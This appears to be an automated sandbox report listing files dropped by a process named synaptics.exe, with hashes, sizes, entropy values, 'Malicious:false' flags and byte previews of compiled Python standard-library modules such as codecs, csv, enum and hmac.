                                                                                                                                                                                                                SHA-512:51BDD2FE2D1CCE347CACFBF8698875C10A3BA62AA5EDED7F941A045139D80B23688021F545B43A7DCAE7AA0346BD876C4C673918C23BB24835F11DE2C739CCFB
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d........................@...sD...d.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.T.W.n...e.y"..Z...z.e.d.e.......d.Z.[.w.w.g.d...Z.d.Z.d...Z.Z.d...Z.Z.d.Z.d.Z.e.j.d.k.rAe...Z.Z.e.Z.n.e...Z.Z.e.Z.e.Z.e.Z.e.Z.e.Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z G.d.d...d...Z!G.d.d...d...Z"dCd#d$..Z#dDd%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(d/d0..Z)d1d2..Z*dEd3d4..Z+dEd5d6..Z,d7d8..Z-d9d:..Z.z.e/d!..Z0e/d;..Z1e/d<..Z2e/d=..Z3e/d>..Z4e/d?..Z5W.n...e6y.......d.Z0d.Z1d.Z2d.Z3d.Z4d.Z5Y.n.w.d.Z7e7..r.d.d.l8Z8e9d@k...r e$e.j:dAdB..e._:e$e.j;dBdA..e._;d.S.d.S.)Fz. codecs -- Python Codec Registry, API and helpers....Written by Marc-Andre Lemburg (mal@lemburg.com)...(c) Copyright CNRI, All Rights Reserved. NO WARRANTY........N)...*z%Failed to load the builtin codecs: %s),..register..lookup..open..EncodedFile..BOM..BOM_BE..BOM_LE..BOM32_BE..BOM32_LE..BOM64_BE..BOM64_LE..BOM_UTF8..BOM_UTF16..BOM_UTF16_LE..BOM_UTF16_BE..BOM_UTF32..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):20905
                                                                                                                                                                                                                Entropy (8bit):5.082130679355031
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:frEHbNxImphzxb/Dqd89tiVqnWcxavd5VCqXfNnpJ:DEHbNxhzpqd2OqnWvQAFf
                                                                                                                                                                                                                MD5:739A234EC8A5D4D5C93FA6342ED9D421
                                                                                                                                                                                                                SHA1:B07E1C72C0ED1334051EA869D62852F087C03D27
                                                                                                                                                                                                                SHA-256:E371FC32DC77EE28702AFEE8EC2DDD81359AC0E17403B9BA8AC7E178E282F9A1
                                                                                                                                                                                                                SHA-512:FBE8A46A658DC74CDDE8A5168A77257868BEB01B1A4778E821EB895EB0ABC228BD63319D186488CB2A908DAC36942E20BCFB78C7E5E5A82F83CD9B0CC647FAE1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.h.......................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e.e.e...Z.G.d.d...d.e.e.e...Z.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&..Z.G.d'd(..d(e.e...Z.G.d)d*..d*e.e...Z.G.d+d,..d,e.e...Z d.S.)-z4Utilities for with-statement contexts. See PEP 343......N)...deque....wraps)...MethodType..Generiuseras)...asynccontextmanager..contextmanager..closing..nullcontext..AbstractContextManager..AbstractAsyncContextManager..AsyncExitStack..ContextDecorator..ExitStack..redirect_stdout..redirect_stderr..suppress..aclosingc....................@....:...e.Z.d.Z.d.Z.e.e...Z.d.d...Z.e.j.d.d.....Z.e.d.d.....Z.d.S.).r....z,An abstract base class for context managers.c....................C........|.S...z0Return `self` upon entering the runtime context.......selfr....r.....+C:
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7006
                                                                                                                                                                                                                Entropy (8bit):5.414533179758389
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:5xPakDZxS5GIVc3isTDOuyib91quyccWEQTidqf2hMQkNv4n5q:ja0/S5GCcR/Iib9wEREkidQ2Ov4k
                                                                                                                                                                                                                MD5:BF0EFD19DC468ED645FB5A31A3BBFA5D
                                                                                                                                                                                                                SHA1:08CE0A9E17F51CA1515FB455A0218F1C2128E164
                                                                                                                                                                                                                SHA-256:39C2A11C7B90F99B687662D98C308AB16EA928B2FF22BE05C7F5E512791667C8
                                                                                                                                                                                                                SHA-512:0BA26A713257BD5493A9C1A3B5E80345E74B191FBA3DA01353C1C976C2466AC49A721871CBB40369DBC8FEC2CA4A1F8FCC616DB35FD3D28C01687133D94A7C81
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.#.......................@...sV...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...G.d.d...d.e...Z.e.Z.z.d.d.l.m.Z...W.n...e.y-......d.Z.Y.n.w.g.d...Z.d.d...Z.i...Z.Z.d.d...Z.e.d...e.e.e.e.e.e.e.e.e.e.e.e.e.j.e.e...e.e...e.j.e.j f.D.].Z!e.e.e!<.q[e"e.d.d...Z!e!d.u.rpe.e.e!<.e#j.e.e#<.e$j.e.e$<.e%j.e.e%<.e&j.e.e&<.e.d.u.r.e.j.e.e.<.[.[!d.g.f.d.d...Z'i...Z(Z.d.d...Z)e)e.e.d...<.e)e.e.e...<.e)e.e.e...<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.<.e)e.e.j*<.e)e.e.<.e)e.e.<.e)e.e.j.<.e)e.e.j.<.e)e.e.j <.e)e.e.<.e'f.d.d...Z+e+e.e#<.e'f.d.d...Z,e,e.e.<.e'f.d.d...Z-e-e.e$<.e.d.u...r.e-e.e.<.d.d...Z.e.e.e.j/<.[.d.d...Z0..d.e'd...d.d...Z1[.[.[.d.S.).a....Generic (shallow and deep) copying operations...Interface summary:.. import copy.. x = copy.copy(y) # make a shallow copy of y. x = copy.deepcopy(y) # make a deep copy of y..For module specific errors, copy.Error is raised...The difference between shallow and deep copying is only relevant for.compound objects (object
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4693
                                                                                                                                                                                                                Entropy (8bit):5.295791134589395
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:tCI7QMLHGjZW9X1XBrxbbJz0uqhUaCWfqmb5p2LYHjmTrhqH3TpYXGP2:LvHGyBrpb56eWfhqLYHjmTkH3TpY2P2
                                                                                                                                                                                                                MD5:48C545CBC6E372D3F85E77301C712B78
                                                                                                                                                                                                                SHA1:AD4BC882C0681E40ECDB2A3D4F3FC38F4D76D524
                                                                                                                                                                                                                SHA-256:D8A4F44E8656A360F9430F5F6BC758B55800458897686BD60316C8C434A738BF
                                                                                                                                                                                                                SHA-512:DFFA61757EBE07CA255EE470418AFA92C1D838C18CF64DB6EF73FF19EA69F1182E9EC281813B3D2804C13B63B27E2DF4148AC2B81FC682DEA61C67F86DCE493D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.g.d...Z.i.Z.d.d.d...Z.d.d...Z.z.e...W.n...e.y.......Y.n.w.d.d...Z.e.e.e.e.....d.d...Z.e.e.e.e.B...e.....d.d...Z.d.Z.e.e.j...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.i.Z.i.Z.i.Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z.Helper to provide extensibility for pickle...This is only useful to add pickle support for extension types defined in.C, not for instances of user-defined classes..)...pickle..constructor..add_extension..remove_extension..clear_extension_cacheNc....................C...s0...t.|...s.t.d.....|.t.|.<.|.d.u.r.t.|.....d.S.d.S.).Nz$reduction functions must be callable)...callable..TypeError..dispatch_tabler....).Z.ob_typeZ.pickle_functionZ.constructor_ob..r.....(C:\Users\user\Desktop\tmp\lib\copyreg.pyr........s................r....c....................C...s....t.|...s.t.d.....d.S.).Nz.constructors must be callable).r....r....)...objectr....r....r....r........s..........r....c....................C...s....t.|.j.|.j.f.f.S...N)...complex..real..ima
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11808
                                                                                                                                                                                                                Entropy (8bit):5.443550974423246
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:aJq1+B75hSIQIWWvBMKumwKZdlXiWQA3LYPqOW9PJFoKzckOMsj9XCCDH:aJqeLSIQ2OKuuZrXiWQA0shzJaYWH
                                                                                                                                                                                                                MD5:1355F3FE6D65F67ACA85A10A1EEB9DA4
                                                                                                                                                                                                                SHA1:654F89C47A473EA2F619FA26520C0A44BA7FD216
                                                                                                                                                                                                                SHA-256:17A5085F63BBCAC42A6FDD0B01FA53F3314781CCEC1ABFB3CB21E505521F564F
                                                                                                                                                                                                                SHA-512:29701EAB98F7A973C01C42A43EB3A3B236AA7D6DE006A9465EBB327E3136E1B770D54717AF1233DB6D119C060E887A1533B37A03D04C945AEF156C9A524F6678
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dZ@.......................@...s....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d.e...Z.e.d.e.....G.d.d...d...Z.G.d.d...d...Z.z.e...W.n...e.y.......e.Z.Y.n.w.G.d.d...d...Z.d.S.).z+.csv.py - read/write/investigate CSV files......N)...Error..__version__..writer..reader..register_dialect..unregister_dialect..get_dialect..list_dialects..field_size_limit..QUOTE_MINIMAL..QUOTE_ALL..QUOTE_NONNUMERIC..QUOTE_NONE..__doc__)...Dialect)...StringIO).r....r....r....r....r....r....r......excel..excel_tabr....r....r....r....r....r......Snifferr....r......DictReader..DictWriter..unix_dialectc....................@...sD...e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.).r....z.Describe a CSV dialect... This must be subclassed (see csv.excel). Valid attributes are:. delimiter, quotechar, escapechar, doublequote, skipinitialspace,.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):56543
                                                                                                                                                                                                                Entropy (8bit):5.249411277758165
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:xoPVdGbiwEyaNVxLZnkM238oZMpj6355j9RsFdVY:xWt1LMP5
                                                                                                                                                                                                                MD5:D0F833CE67C12032FFF4E2FA82F2BB0C
                                                                                                                                                                                                                SHA1:7BE66D06F5A01F978D9886D78919AD503DBBB723
                                                                                                                                                                                                                SHA-256:780ECF5DA88619C6532A1DFFF5854202EE8199E80318B18D7B788A5D9D7EDB2A
                                                                                                                                                                                                                SHA-512:70E0FA00CE3547DA2B43E3CDB34F85B8C8BC2FF8DDC606E842F6BE6BF5ABFDC8DA218281C947736BB28E0534D691182762A460DF3511343C94E3ED934ACCEBC5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.a.......................@...sr...d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.Z.d.Z.d.Z.g.d...Z.d.g.Z.d.Z.e.d.d.....D.].Z.e...e.....e.e.7.Z.q/[.[.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d.k.scJ...e.d.e...d...k.smJ...e.d.e...d...k.swJ...d.d...Z.g.d...Z.g.d...Z.d d!..Z.d\d#d$..Z.d%d&..Z d'd(..Z!d)d*..Z"d+d,..Z#d-d...Z$d/d0..Z%d1d2..Z&d3d4..Z'd5d6..Z(d7d8..Z)d9d:..Z*d;d<..Z+G.d=d>..d>..Z,e,d?..e,_-e,d@dAdBdBdCdD..e,_.e,d.dE..e,_/G.dFdG..dG..Z0e0Z1e0d.d.d...e0_-e0d.dHdI..e0_.e,d.dJ..e0_/G.dKdL..dL..Z2G.dMdN..dNe3..Z4e4Z5[4e2Z6G.dOdP..dP..Z.e.Z7e.d.d.d...e._-e.dAdBdBdC..e._.e,d.dE..e._/G.dQdR..dRe0..Z8e8d.d.d...e8_-e8d.dHdIdAdBdBdC..e8_.e,d.dE..e8_/dSdT..Z9G.dUdV..dVe2..Z:e:.;e,d.....e:_<e:.;e,dAdBdW......e:_-e:.;e,dAdBdW....e:_.e8dXd.d.e:j<dY..Z=z.d.dZl>T.W.n...e?..y.......Y.d.S.w.[.[.[.[.[.[.[=[.[.[.['[([)[%[&[.[*[1[.[.[.[.[ [.[.[9[.[.[.[7[6[![.[+["[$[#[5d.d[l>m.Z...d.S.)]z.Concrete date/time and related types...See http://www.iana.org/time-
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26073
                                                                                                                                                                                                                Entropy (8bit):5.284311175719468
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:wGTKcmNJ6I61HjkGoQEARW5nV3j412nrp+6s8LY4F8AGK/h3Ec:wiGNJgJEARW3Ea+VZ4F8AGK/Wc
                                                                                                                                                                                                                MD5:C6A035E5D58D39A99EEE9D8AF92C9B02
                                                                                                                                                                                                                SHA1:5F0AA9B8F3B98BE4F399E5E6C586BB228F8C386B
                                                                                                                                                                                                                SHA-256:F759C3657266C495BD5E7320D313CD294EA07277732D1DF63CCB99A58C5D1118
                                                                                                                                                                                                                SHA-512:8A09FF769DDF22E0E76ABBF67A3F92EA3E554DFAC93CE49975BA9202EA60FBCB5AC84C921DE685CFD047AAFC26FF0266C9CF09786BB5F0FFF6D9FE83FD58B3E5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.d.l.Z.d.d.l.m.Z.m.Z...g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e.d...Z.G.d.d...d.e.e...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.d ..Z.d!d"..Z.d#d$..Z.d.S.)%.....N)...MappingProxyType..DynamicClassAttribute)...EnumMeta..Enum..IntEnum..Flag..IntFlag..auto..uniquec....................C...s....t.|.d...p.t.|.d...p.t.|.d...S.).z?. Returns True if obj is a descriptor, False otherwise.. ..__get__..__set__..__delete__)...hasattr)...obj..r.....%C:\Users\user\Desktop\tmp\lib\enum.py.._is_descriptor....s..............r....c....................C...sL...t.|...d.k.o%|.d.d.....|.d.d.........k.o.d.k.n.....o%|.d...d.k.o%|.d...d.k.S.).z=. Returns True if a __dunder__ name, False otherwise.. .....N..........Z.__.._.........len....namer....r....r......_is_dunder....s......&...........r....c....................C...sL...t.|...d.k.o%|.d...|.d.......k.o.d.k.n.....o%|.d.d....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4254
                                                                                                                                                                                                                Entropy (8bit):5.659278809130651
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:3Z1NvFl7gPHnOns99V7Ry+/63Tq7Y1qYmWVzHRJwZLaL1iCtiOy9:31vFl7g/OnsV7g7HzTRbdUV
                                                                                                                                                                                                                MD5:2E1C1772F68B3375D93776146D840C64
                                                                                                                                                                                                                SHA1:4D159790AC9D5E7FFBCF77811D9ACCCE67CB6574
                                                                                                                                                                                                                SHA-256:1D15C502540DEE0D35185D6255E001BCE4FFC4AB1C7F8BD4F0F4CBFBED77A504
                                                                                                                                                                                                                SHA-512:67EA0340BAAAD41D38E72D3F781B5B2C152035FFB637BC1426CC8EA42D71CBCA30C5B4A70C9302D2C0A46F063B34D21E10B764E1CBC78ADD15397C07E6686D14
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s|...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.l.m.Z...e...j.Z.[.d.d...Z.e.j.d.d.d...d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.S.).a....Filename matching with shell patterns...fnmatch(FILENAME, PATTERN) matches according to the local convention..fnmatchcase(FILENAME, PATTERN) always takes case in account...The functions operate by translating the pattern into a regular.expression. They cache the compiled regular expressions for speed...The function translate(PATTERN) returns a regular expression.corresponding to PATTERN. (It does not compile it.)......N)...filter..fnmatch..fnmatchcase..translate)...countc....................C...s"...t.j...|...}.t.j...|...}.t.|.|...S.).a....Test whether FILENAME matches PATTERN... Patterns are Unix shell style:.. * matches everything. ? matches any single character. [seq] matches any character in seq. [!seq] matches any char not in seq.. An initial period in FILENAME is not spec
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):28345
                                                                                                                                                                                                                Entropy (8bit):5.344797759090209
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:4oO3KwXQNi3/sZoyIw/kj5N4V+xIhb85NxshpCzCLF:4o16QNi30Cj5iV+0b853IMmLF
                                                                                                                                                                                                                MD5:BF172CCF72D64EE6567D0499F6AA4B08
                                                                                                                                                                                                                SHA1:7D9A3FD237A53CEAE9D21E4657A1DD05B54FBF42
                                                                                                                                                                                                                SHA-256:9BE3934AA828A3D8F822351B6F2D48133489AE75FEBA750503C0069DC2AA695A
                                                                                                                                                                                                                SHA-512:CEEA06346B254F2A82916980DFD564A9686C8D26AC7F41AFE31AF58626E6AD3BB7CDEA03A2176827397CC4D764B43368939401C55C5AA2BE767923B615B6C565
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.f.d.d...Z.e.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d d!..Z.e.f.d"d#..Z.e.f.d$d%..Z.d&e.f.d'e.f.d(e.f.g.d(e.f.d)e.f.d&e.f.g.d)e.f.d(e.f.d'e.f.g.d'e.f.d&e.f.d)e.f.g.d*..Z.d+d,..Z.d-d...Z.z.d.d/l m.Z...W.n...e!y.......Y.n.w.e"..Z#e#f.d0d1..Z$z.d.d2l m$Z$..W.n...e!y.......Y.n.w.G.d3d4..d4..Z%z.d.d5l m%Z%..W.n...e!y.......Y.n.w.G.d6d7..d7e"..Z&d8d9..Z'e.d:g.d;....Z(G.d<d=..d=e)..Z*e"..f.e+e,h.e-e.e/f.d>d?..Z0dXdBdC..Z1dDdE..Z2z.d.dFl m2Z2..W.n...e!..y;......Y.n.w.dGdH..Z3dIdJ..Z4dYdLdM..Z5dNdO..Z6dPdQ..Z7dRdS..Z8G.dTdU..dU..Z9e"..Z:G.dVdW..dW..Z;dKS.)ZzEfunctools.py - Tools for working with functions and callable objects.)...update_wrapper..wraps..WRAPPER_ASSIGNMENTS..WRAPPER_UPDATES..total_ordering..cache..cmp_to_key..lru_cache..reduce..partial..partialmethod..singledispatch..si
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3917
                                                                                                                                                                                                                Entropy (8bit):5.162544920340737
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:yqsfAs4EvXosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:hs4gtKyow8/tjgqWoZ
                                                                                                                                                                                                                MD5:0893483D5099662126A9F76E9D940B34
                                                                                                                                                                                                                SHA1:3421D7482E19D23673D33DD97D7767AF61531317
                                                                                                                                                                                                                SHA-256:7E3F9D032D3B050873798B26EE65DCA2DB3AC883D301FBDCA4F96CE98F0D1327
                                                                                                                                                                                                                SHA-512:E2B6F7BE32A72D8B7431E442431895C0182CD143997EBC896DC7F9488C3F09C27B0980EC1FA95520019EF6B1FFA465A8E2128AF8E33A05E5FE278B8FB0D42C76
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r.....,C:\Users\user\Desktop\tmp\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....).z<Return true if the
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6855
                                                                                                                                                                                                                Entropy (8bit):5.593488193903666
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:kdPjhwzUgQUdROKh0WXI7dQia/586skt6iojyyt8NQCcx54bNdO9DF4irm/tMm6u:kRmE5+odQiaB8Jktv4OmVP/4XbJ4nJ0
                                                                                                                                                                                                                MD5:35232F9BAED05CEDC693D888C786DD16
                                                                                                                                                                                                                SHA1:A429AF8D5796BBBBB9002CB3B3222F3993D9AB5A
                                                                                                                                                                                                                SHA-256:646551DA558ECE77F57C25B48574166C3715845841DEF543A1128B2A3C485832
                                                                                                                                                                                                                SHA-512:4D115067429CB99DE0E315E0592212BE034603AED116EC99CE59C06D5B966841BCD0D554B7B0AD8E0C2F9077D7DDE2058662DA9F58EA457B4D7A1DDC9227EE6F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.).......................@...sl...d.Z.d.Z.e.e...Z.e.e...Z.e.d...Z.i.Z.d.d.h.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.z.d.d.l.Z.e.Z.e.Z.e...e.j...Z.W.n...e.yG......d.Z.e.Z.e.Z.Y.n.w.z.d.d.l.m.Z...W.n*..e.yz......d.d.l.m.Z...e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.d.d...Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.D.].Z.z.e.e...e...e.<.W.q...e.y.......d.d.l.Z.e...d.e.....Y.q.w.[.[.[.[.[.[.d.S.).a3...hashlib module - A common interface to many hash functions...new(name, data=b'', **kwargs) - returns a new hash object implementing the. given hash function; initializing the hash. using the given binary data...Named constructor functions are also available, these are faster.than using new(name):..md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),.sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256...More algorithms may be available on your platform but the above are guaranteed
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13875
                                                                                                                                                                                                                Entropy (8bit):5.351682965499902
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:+nqTYZnQtot7ItafyjjWya/PXOFGRxibJWiTqe0hN2leov+Ugn:+nEYZn0ot7It7j3aXOgRxiM0uN2kk+/n
                                                                                                                                                                                                                MD5:6742BB7BA2292F159C07A0794DCA23C0
                                                                                                                                                                                                                SHA1:EE6898DD85E6A807D6CB768B544DF37D96B8882C
                                                                                                                                                                                                                SHA-256:8810EB371478399EE6422F17F51E1E50292756C7899D00D1FE3B90362A6B0BE8
                                                                                                                                                                                                                SHA-512:1068AA99F8DF30DBEE3F72668318502EA01360223FB62E825E92B804E33CB4189165A6275AB59E6B1E8E2749E0D1A3EC897B96DCC4377888946536806309C3E6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6983
                                                                                                                                                                                                                Entropy (8bit):5.294876689868299
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:fXFTSdeLSo3yfjb/3xXrCx5PgT1nxc203AbC:fXFT0eLhyX1K5S1nv0QbC
                                                                                                                                                                                                                MD5:41603A7E23EF13076470B65C8FACDDE8
                                                                                                                                                                                                                SHA1:A2435F3052458C1E57263728775424D8337D1869
                                                                                                                                                                                                                SHA-256:26149805BCF65C4B0C591D7E009FA489925CA75870BB698BA762C1C8562DBC13
                                                                                                                                                                                                                SHA-512:85C78263585B5E3BAFB0AA3526E99860CBF029ADE458D8608F0F5AAE4B43788CC2DAEC7917B41CEFAE9E41170C31C9B8748CC7611EE3B22EF4E7FCADD70E89A9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y.......d.Z.d.Z.d.d.l.m.Z...Y.n.w.e.j.Z.e.e.j...Z.d.d.l.Z.e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.d.S.).zqHMAC (Keyed-Hashing for Message Authentication) module...Implements the HMAC algorithm as described by RFC 2104.......N)..._compare_digestc....................c..........|.].}.|.d.A.V...q.d.S.)..\...N.......0..xr....r.....%C:\Users\user\Desktop\tmp\lib\hmac.py..<genexpr>.............r.........c....................c...r....)..6...Nr....r....r....r....r....r........r....c....................@...sf...e.Z.d.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...HMACz~RFC 2104 HMAC class. Also complies with RFC 4231... This supports the API for Cryptographic Hash Functions (PEP 247).. .@...)..._hmac.._inner.._outer..block_size..digest_sizeN..c....................C...s....t.|.t.t.f...s.t.d.t.|...j.......|.s.t.d.....t.r<t.|
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3673
                                                                                                                                                                                                                Entropy (8bit):5.387204534690096
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:njeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwGzPOcGcMzzMfSWI:nUK0iSxOmoWF2vLAy/hyzP7GcmYa7RXn
                                                                                                                                                                                                                MD5:8D2203CE3498FB154974CC22406DB1AF
                                                                                                                                                                                                                SHA1:5105B8868533E67887FA5A2A101A6CC1F0DFC23D
